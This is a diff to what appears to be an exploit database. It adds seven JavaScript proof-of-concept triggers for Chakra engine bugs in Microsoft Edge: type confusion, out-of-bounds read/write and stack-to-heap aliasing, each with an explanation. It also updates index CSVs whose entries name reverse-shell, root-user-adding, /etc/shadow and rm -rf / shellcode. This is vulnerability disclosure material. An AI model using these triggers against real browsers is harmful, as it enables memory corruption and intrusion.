+// At (a), Chakra considers "j" to be always in the range of INT_MIN to 15, the length of "arr" has been already guaranteed to be upper than 15, so it eliminates the bounds check.
--- a/exploits/windows/dos/43713.js
+++ b/exploits/windows/dos/43713.js
@ -0,0 +1,39 @@
+/*
+Here's a snippet of the method.
+bool JavascriptGeneratorFunction::GetPropertyBuiltIns(Var originalInstance, PropertyId propertyId, Var* value, PropertyValueInfo* info, ScriptContext* requestContext, BOOL* result)
+{
+    if (propertyId == PropertyIds::length)
+    {
+        ...
+        int len = 0;
+        Var varLength;
+        if (scriptFunction->GetProperty(scriptFunction, PropertyIds::length, &varLength, NULL, requestContext))
+        {
+            len = JavascriptConversion::ToInt32(varLength, requestContext);
+        }
+        ...
+        return true;
+    }
+
+    return false;
+}
+
+"JavascriptGeneratorFunction" is like a wrapper class used to ensure the arguments for "scriptFunction". So "scriptFunction" must not be exposed to user JavaScript code. But the vulnerable method exposes "scriptFunction" as "this" when getting the "length" property.
+
+The code should be like: "scriptFunction->GetProperty(this, PropertyIds::length, &varLength, NULL, requestContext);"
+
+Type confusion PoC:
+*/
+
+function* f() {
+}
+
+let g;
+f.__defineGetter__('length', function () {
+    g = this;  // g == "scriptFunction"
+});
+
+
+f.length;
+
+g.call(0x1234, 0x5678);  // type confusion
--- a/exploits/windows/dos/43715.js
+++ b/exploits/windows/dos/43715.js
@ -0,0 +1,12 @@
+// PoC:
+
+(function func(arg = function () {
+    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
+}()) {
+    print(func);
+    function func() {
+
+    }
+})();
+
+// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.
--- a/exploits/windows/dos/43717.js
+++ b/exploits/windows/dos/43717.js
@ -0,0 +1,24 @@
+/*
+Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to  issue 1310 .
+
+PoC:
+*/
+
+// Enable the flag using '\n'.repeat(0x1000)
+eval(`(function f() {
+    with ({}) {
+        (function () {
+            print(f);
+        })();
+    }
+}());` + '\n'.repeat(0x1000));
+
+PoC 2:
+// ./ch poc.js -ForceDeferParse
+(function f() {
+    with ({}) {
+        (function () {
+            print(f);
+        })();
+    }
+}());
--- a/exploits/windows/dos/43718.js
+++ b/exploits/windows/dos/43718.js
@ -0,0 +1,28 @@
+// Here's the PoC demonstrating OOB write.
+
+function opt(arr, start, end) {
+    for (let i = start; i < end; i++) {
+        if (i === 10) {
+            i += 0;  // <<-- (a)
+        }
+        arr[i] = 2.3023e-320;
+    }
+}
+
+function main() {
+    let arr = new Array(100);
+    arr.fill(1.1);
+
+    for (let i = 0; i < 1000; i++)
+        opt(arr, 0, 3);
+
+    opt(arr, 0, 100000);
+}
+
+main();
+
+/*
+What happens here is as follows:
+In the loop prepass analysis, (a) is a valid add operation. It's a relative operation to "i", so Chakra thinks it's a valid loop. The variable "i" now becomes an induction variable, and a LoopCount object is created. When the LoopCount object is created, the ValueInfo of "i" is IntBounded which contains relative bounds information. 
+In the actual optimization phase, (a) gets optimized and becomes a load operation which directly loads 10 to "i". It's no more relative operation, therefore the ValueInfo of "i" is not to be IntBounded. But the LoopCount object has already been created with the previous information. This leads Chakra to fail computing bounds which may result in OOB read/write.
+*/
--- a/exploits/windows/dos/43720.js
+++ b/exploits/windows/dos/43720.js
@ -0,0 +1,21 @@
+/*
+AsmJSByteCodeGenerator::EmitCall which is used to emit call insturctions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as "arr[idx & ...]()". In these cases, the index register remains NoRegister which is (uint32_t)-1. It results in OOB read.
+
+PoC:
+*/
+
+function Module() {
+    'use asm';
+    function f() {
+        arr();
+    }
+
+    function g() {
+    }
+
+    var arr = [g];
+    return f;
+}
+
+let f = Module();
+f();
--- a/exploits/windows/dos/43723.js
+++ b/exploits/windows/dos/43723.js
@ -0,0 +1,65 @@
+/*
+If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing to arguments containing stack-allocated variables, where those variables should not exist in the stack. In these cases, the stack-allocated variables are copied to the heap. This is performed by the "*::BoxStackInstance" methods.
+
+Here's an example.
+function inlinee() {
+    return inlinee.arguments[0];
+}
+
+function opt() {
+    let stack_arr = [];
+    // allocate segment to the heap
+    for (let i = 0; i < 100; i++)
+        stack_arr[i] = 0;
+
+    let heap_arr = inlinee(stack_arr);
+    heap_arr[0] = 2;
+
+    print(stack_arr[0]);
+}
+
+function main() {
+    for (let i = 0; i < 100; i++) {
+        opt();
+    }
+}
+
+main();
+
+"stack_arr" is allocated in the stack. When accessing "inlinee.arguments", the stack-allocated variable gets copied to the heap. Therefore, the copied-heap-variable "heap_arr" has the same structure with "stack_arr". The code shows that the two variables share the same buffer by printing out "2". This means, even if one of those arrays' type changes, the other array can access the same buffer with the previous type.
+
+PoC:
+*/
+
+function inlinee() {
+    return inlinee.arguments[0];
+}
+
+function opt(convert_to_var_array) {
+    /*
+    To make the in-place type conversion happen, it requires to segment.
+    */
+
+    let stack_arr = [];  // JavascriptNativeFloatArray
+    stack_arr[10000] = 1.1;
+    stack_arr[20000] = 2.2;
+
+    let heap_arr = inlinee(stack_arr);
+    convert_to_var_array(heap_arr);
+
+    stack_arr[10000] = 2.3023e-320;
+
+    return heap_arr[10000];
+}
+
+function main() {
+    for (let i = 0; i < 10000; i++) {
+        opt(new Function(''));  // Prevents to be inlined
+    }
+
+    print(opt(heap_arr => {
+        heap_arr[10000] = {};  // ConvertToVarArray
+    }));
+}
+
+main();
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -1301,8 +1301,8 @@ id,file,description,date,author,type,platform,port
 10580,exploits/hardware/dos/10580.rb,"3Com OfficeConnect Routers - 'Content-Type' Denial of Service",2009-12-21,"Alberto Ortega",dos,hardware,
 10593,exploits/windows/dos/10593.txt,"Winamp 5.57 - Stack Overflow",2009-12-22,scriptjunkie,dos,windows,
 10603,exploits/windows/dos/10603.c,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,dos,windows,
-10617,exploits/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow (PoC)",2009-12-23,sandman,dos,linux,
-10634,exploits/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)",2009-12-24,sandman,dos,linux,
+10617,exploits/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow (PoC)",2009-12-23,$andman,dos,linux,
+10634,exploits/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC)",2009-12-24,$andman,dos,linux,
 10650,exploits/windows/dos/10650.pl,"jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)",2009-12-25,"D3V!L FUCKER",dos,windows,
 10651,exploits/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 - '.asx' Buffer Overflow (PoC)",2009-12-25,"D3V!L FUCKER",dos,windows,
 10820,exploits/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,dos,php,80
@ -5248,6 +5248,13 @@ id,file,description,date,author,type,platform,port
 40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",dos,osx,
 40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",dos,windows,
 43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",2018-01-15,ScrR1pTK1dd13,dos,windows,
+43710,exploits/windows/dos/43710.js,"Microsoft Edge Chakra JIT - Incorrect Bounds Calculation",2018-01-17,"Google Security Research",dos,windows,
+43713,exploits/windows/dos/43713.js,"Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion",2018-01-17,"Google Security Research",dos,windows,
+43715,exploits/windows/dos/43715.js,"Microsoft Edge Chakra - Incorrect Scope Handling",2018-01-17,"Google Security Research",dos,windows,
+43717,exploits/windows/dos/43717.js,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)",2018-01-17,"Google Security Research",dos,windows,
+43718,exploits/windows/dos/43718.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Write",2018-01-17,"Google Security Research",dos,windows,
+43720,exploits/windows/dos/43720.js,"Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read",2018-01-17,"Google Security Research",dos,windows,
+43723,exploits/windows/dos/43723.js,"Microsoft Edge Chakra JIT - Stack-to-Heap Copy",2018-01-17,"Google Security Research",dos,windows,
 40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
 40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
 40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -15814,6 +15821,8 @@ id,file,description,date,author,type,platform,port
 43589,exploits/windows/remote/43589.py,"Disk Pulse Enterprise 10.1.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
 43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,
 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,
+43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091
+43693,exploits/hardware/remote/43693.txt,"Master IP CAM 01 - Multiple Vulnerabilities",2018-01-17,"Raffaele Sabato",remote,hardware,
 40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple,
 40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,
 40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471
@ -37162,6 +37171,11 @@ id,file,description,date,author,type,platform,port
 43594,exploits/java/webapps/43594.txt,"Oracle PeopleSoft 8.5x - Remote Code Execution",2018-01-15,"Vahagn Vardanyan",webapps,java,
 43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
 43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
+43667,exploits/php/webapps/43667.txt,"Zomato Clone Script - Arbitrary File Upload",2018-01-17,Tauco,webapps,php,
+43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,
+43678,exploits/hardware/webapps/43678.txt,"D-Link DSL-2640R - Unauthenticated DNS Change",2018-01-17,"Todor Donev",webapps,hardware,
+43682,exploits/hardware/webapps/43682.txt,"Belkin N600DB Wireless Router - Multiple Vulnerabilities",2018-01-17,Wadeek,webapps,hardware,
+43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php,
 40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
 40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
 40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -63,7 +63,7 @@ id,file,description,date,author,type,platform
 13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
 13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
 13307,shellcodes/linux_x86/13307.c,"Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
-13308,shellcodes/linux_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
+13308,shellcodes/linux_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + fork() Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
 13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86
 13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86
 13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
@ -85,7 +85,7 @@ id,file,description,date,author,type,platform
 13327,shellcodes/linux_x86/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",shellcode,linux_x86
 13328,shellcodes/generator/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,shellcode,generator
 13329,shellcodes/linux_x86/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
-13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
+13330,shellcodes/linux_x86/13330.c,"Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,shellcode,linux_x86
 13331,shellcodes/linux_x86/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)",2008-11-19,Rick,shellcode,linux_x86
 13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,shellcode,linux_x86
 13333,shellcodes/linux_x86/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,shellcode,linux_x86
@ -103,9 +103,9 @@ id,file,description,date,author,type,platform
 13345,shellcodes/linux_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
 13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
 13347,shellcodes/linux_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
-13348,shellcodes/linux_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
+13348,shellcodes/linux_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13349,shellcodes/linux_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
-13350,shellcodes/linux_x86/13350.c,"Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
+13350,shellcodes/linux_x86/13350.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13351,shellcodes/linux_x86/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13352,shellcodes/linux_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
 13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86
@ -140,7 +140,7 @@ id,file,description,date,author,type,platform
 13382,shellcodes/linux_x86/13382.c,"Linux/x86 - execve(/bin/sh) + Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,shellcode,linux_x86
 13383,shellcodes/linux_x86/13383.c,"Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)",2006-01-25,izik,shellcode,linux_x86
 13384,shellcodes/linux_x86/13384.c,"Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)",2006-01-25,izik,shellcode,linux_x86
-13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
+13385,shellcodes/linux_x86/13385.c,"Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes)",2006-01-21,izik,shellcode,linux_x86
 13386,shellcodes/linux_x86/13386.c,"Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)",2006-01-21,izik,shellcode,linux_x86
 13387,shellcodes/linux_x86/13387.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)",2006-01-21,izik,shellcode,linux_x86
 13388,shellcodes/linux_x86/13388.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)",2006-01-21,izik,shellcode,linux_x86
@ -151,7 +151,7 @@ id,file,description,date,author,type,platform
 13393,shellcodes/linux_x86/13393.c,"Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)",2006-01-21,izik,shellcode,linux_x86
 13394,shellcodes/linux_x86/13394.c,"Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)",2006-01-21,izik,shellcode,linux_x86
 13395,shellcodes/linux_x86/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,shellcode,linux_x86
-13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
+13396,shellcodes/linux_x86/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)",2006-01-21,izik,shellcode,linux_x86
 13397,shellcodes/linux_x86/13397.c,"Linux/x86 - reboot() Shellcode (20 bytes)",2006-01-21,izik,shellcode,linux_x86
 13398,shellcodes/linux_x86/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,shellcode,linux_x86
 13399,shellcodes/linux_x86/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,shellcode,linux_x86
@ -162,9 +162,9 @@ id,file,description,date,author,type,platform
 13404,shellcodes/linux_x86/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf() Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
 13405,shellcodes/linux_x86/13405.c,"Linux/x86 - _exit(1) Shellcode (7 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
 13406,shellcodes/linux_x86/13406.c,"Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
-13407,shellcodes/linux_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
+13407,shellcodes/linux_x86/13407.c,"Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_x86
 13408,shellcodes/linux_x86/13408.c,"Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)",2005-11-04,phar,shellcode,linux_x86
-13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86
+13409,shellcodes/linux_x86/13409.c,"Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes)",2005-09-15,c0ntex,shellcode,linux_x86
 13410,shellcodes/linux_x86/13410.s,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2)",2005-09-09,xort,shellcode,linux_x86
 13411,shellcodes/linux_x86/13411.c,"Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)",2005-09-08,xort,shellcode,linux_x86
 13412,shellcodes/linux_x86/13412.c,"Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)",2005-09-04,BaCkSpAcE,shellcode,linux_x86
@ -174,16 +174,16 @@ id,file,description,date,author,type,platform
 13416,shellcodes/linux_x86/13416.txt,"Linux/x86 - upload + exec Shellcode (189 bytes)",2005-06-19,cybertronic,shellcode,linux_x86
 13417,shellcodes/linux_x86/13417.c,"Linux/x86 - setreuid() + execve() Shellcode (31 bytes)",2004-12-26,oc192,shellcode,linux_x86
 13418,shellcodes/linux_x86/13418.c,"Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes)",2004-12-22,xort,shellcode,linux_x86
-13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86
+13419,shellcodes/linux_x86/13419.c,"Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)",2004-12-22,xort,shellcode,linux_x86
 13420,shellcodes/linux_x86/13420.c,"Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)",2004-12-22,xort,shellcode,linux_x86
 13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86
 13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86
 13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86
-13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
+13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
 13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
 13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
 13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
-13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
+13428,shellcodes/linux_x86/13428.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
 13429,shellcodes/linux_x86/13429.c,"Linux/x86 - chmod 666 /etc/shadow + Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",shellcode,linux_x86
 13430,shellcodes/bsd_x86/13430.c,"BSD/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
 13431,shellcodes/linux_x86/13431.c,"Linux/x86 - Kill Snort Shellcode (151 bytes)",2004-09-26,nob0dy,shellcode,linux_x86
@ -205,7 +205,7 @@ id,file,description,date,author,type,platform
 13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve(/bin/sh) + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86
 13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
 13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
-13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
+13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
 13451,shellcodes/linux_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,linux_x86
 13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (28 bytes)",2004-09-12,dev0id,shellcode,linux_x86
 43633,shellcodes/openbsd_x86/43633.c,"OpenBSD/x86 - Load Kernel Module (/tmp/o.o) Shellcode (66 bytes)",2009-01-01,dev0id,shellcode,openbsd_x86
@ -216,7 +216,7 @@ id,file,description,date,author,type,platform
 13457,shellcodes/linux_x86/13457.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)",2004-09-12,anonymous,shellcode,linux_x86
 13458,shellcodes/linux_x86/13458.c,"Linux/x86 - setreuid(0_0) + execve(/bin/sh) Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",shellcode,linux_x86
 13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
-13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
+13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
 13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
 13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
 13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
@ -266,7 +266,7 @@ id,file,description,date,author,type,platform
 13509,shellcodes/windows_x86/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,windows_x86
 13510,shellcodes/windows_x86/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86
 13511,shellcodes/windows_x86/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
-13512,shellcodes/windows_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
+13512,shellcodes/windows_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
 13513,shellcodes/windows_x86/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
 13514,shellcodes/windows_x86/13514.asm,"Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
 13515,shellcodes/generator/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
@ -300,12 +300,12 @@ id,file,description,date,author,type,platform
 13569,shellcodes/windows_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
 13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
 13571,shellcodes/windows_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
